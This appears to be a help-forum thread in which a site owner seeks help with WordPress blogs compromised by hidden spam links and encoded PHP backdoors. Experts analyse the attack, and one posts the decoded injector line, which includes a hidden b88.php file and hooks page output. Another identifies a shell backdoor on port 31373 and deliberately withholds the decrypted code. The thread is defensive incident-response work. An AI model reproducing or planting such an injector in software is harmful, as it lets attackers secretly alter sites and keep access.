Several Wordpress Blogs Hacked with Outbound Comments HTML Links

Hannahro11
Hannahro11 used Ask the Experts™
on
Hello,

We need someone to help us fix a Wordpress hack Job where all of the Wordpress sites on our own server have appeared to be hacked by the same breech. This hack is pretty insidious in that it installs hidden outbound links in the stylesheet. Once we hit "approve" to comments it bleeds the blog dry of all page rank (SEO terminology). We do not know how this hole occurred, and we want to fix it on our server. I have attached an example of the hack as it appears in the area compromised. This has occurred on all the blogs in this jail on our server.

The attached file, 'hacked text at bottom of posts.txt', is a sample of what's appended to the post when you view the source - not viewable on the webpage via a browser.
 
The scond text (php-hack) I've manually replaced all of the php files in the blog and the theme - there had been a block of encrypted stuff at the top of many php scripts, the main php scripts for the theme and the main wp style sheet - attached is a sample of that, too; php-hack.txt

Again, let us know if you can help.  php-hack.txt
blog-hack-1.txt
Comment
Watch Question

Do more with

Expert Office
EXPERT OFFICE® is a registered trademark of EXPERTS EXCHANGE®
Jason C. LevineDon't talk to me.

Commented:
Hi Hannahro11,

Typically what bad guys do is compromise the server via an FTP or shell account and then setup a script that seeks out WordPress (because it is so common) and alters the files there to redirect or display different content.

Is this your own server or is it hosted?

Author

Commented:
It is our own server.

Author

Commented:
You are right, this means that the Shell may have been compromised without Cpanel. Or each blog was compromised individually. Strange. What to do. (smile)
How to Generate Services Revenue the Easiest Way

This Tuesday! Learn key insights about modern cyber protection services & gain practical strategies to skyrocket business:

- What it takes to build a cloud service portfolio
- How to determine which services will help your unique business grow
- Various use-cases and examples

Jason C. LevineDon't talk to me.

Commented:
My expertise in this sort of ends with WordPress.  I've seen these types of hacks before which is why I commented.  

You should probably hit Request Attention above and ask the Moderators to resend alerts.
I took a look at the encoded php file you sent and this what the unencoded version looks like.

/*eoltijfbzgjhmixzqarebwipjfgniyhagohvmezlkpojkepldd*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/usr/local/www/blogs/getthetrafficnow/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/b88.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Do you still have a copy of that file b88.php? If so can you attach I here? I believe that maybe how they intended on gaining access after the fact, just want to confirm.

Author

Commented:
I am checking with the sever admin and will get right back. Thank you very much for the right question, by the way.
What did they have to say?

Author

Commented:
Hi Russell, he is still looking at it. Sorry long night. (smile)
Is there more encrypted files? Also what version of wordpress is being used? Any specific plugging being used?

Author

Commented:
Yes, I finally got the encrypted files. Attached.

a bit more background...
 
I had painstakingly removed the encoded stuff from all the php files, so I grabbed a header from a file on a different blog in my network.

the b88.php file exists on this other blog, not on the blog that I attached files for previously.
 
not sure what to make of that...
 
but here is the b88.php file
 
In the same folder there was a mysterious c120.php file and sure enough, when I look at it, it's encoded as well...
 
so both files are zipped up and attached.
 
I'll see if I can find one of the old infected files from the original blog (our most pofitable site), I might have kept a copy somewhere.. Also. we are new to Experts-exchange and are sort of interested in who you are (Russell Venable) as we have issues come up all the time.
 encoded-header-1.txt encoded-header-1.txt encoded-header-1.txt c120.txt
b88.txt
Welcome to EE! My Profile pretty much sums it up. I am not sure exactly what you want to know.  I will take a look at the files and see what I can come up with.
Ok, I have good news and I have bad news.. Let's start with bad news. You may have a shell running on your system right now on port:31373. You need to make sure that port is closed ASAP! Good news is I decrypted all the files in question, successfully. I will not be posting the unencrypted versions here for many good reasons.

Both h88.php and c120.php are both Trojan backdoors and they both vary on how they work. H88.php is what is creating those links on your page. C120.php on the other hand is a shell script backdoor that allows the person who uploaded it to gain access whenever they like. The rest of the files where some kind of spam link generation code. Has the admin looked at the security logs for the past week? I would check them and also start logging http traffic and block the after mentioned port address. As for how they got onto the system I will need to know a few details about the system. If your are uncomfortable talking about it here. I have a email address you can use to contact me. We will get to bottom of this.
I broke the password to the shell and also found another Trojan. You should be able to find it and remove it at /images/icons/32/5cc.php

Author

Commented:
Hello Russell,
Pretty blown away by this. I will take this to my administrators now and see what they both say. I will get back to you as soon as I have their response. Thanks a lot my friend. Be right back.  

Author

Commented:
Hi Russell.

I think we are uncomfortable talking about this here. Can you email me at <removed> so we can move forward with your line of reasoning?

Thank you.

My name is also Russell
Will make sure of that. Just don't want there personal business posted all over EE.
I plan on it :)
Hannahro11, sent you a email.

Do more with

Expert Office
Submit tech questions to Ask the Experts™ at any time to receive solutions, advice, and new ideas from leading industry professionals.

Start 7-Day Free Trial